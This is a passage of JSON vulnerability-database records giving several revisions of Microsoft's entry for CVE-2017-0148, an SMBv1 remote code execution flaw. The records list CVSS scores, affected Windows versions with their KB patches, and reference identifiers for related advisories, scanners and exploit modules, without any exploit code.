x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T19:05:15", "differentElements": ["msAffectedSoftware"], "edition": 34}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T20:47:14", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KBMS16-110, 3187754", "KB3212646", "KB3210720", "KB4013198", "KB4012216", "KB3205401", 
"KB4012598", "KB3210721", "KB4013429", "KB4012217", "KB4012606", "KB4012212", "KB4012213", "KB3205409", "KB3213986", "KB3177186", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T20:47:14", "differentElements": ["msAffectedSoftware"], "edition": 35}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T22:53:48", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T22:53:48", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-11T22:53:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012212", "KB3210720", "KB4012606", "KB4012217", "KB3212646", "KB4012216", "KB4012214", "KBMS16-110, 3187754", "KB3213986", "KB4012598", "KB3205401", "KB3177186", "KB3210721", "KB4012213", "KB4012215", "KB3205409", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T22:53:48", "differentElements": ["msAffectedSoftware"], "edition": 36}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "3c8f710d7629e55dea40adfa20c8440d", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-12T04:44:31", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 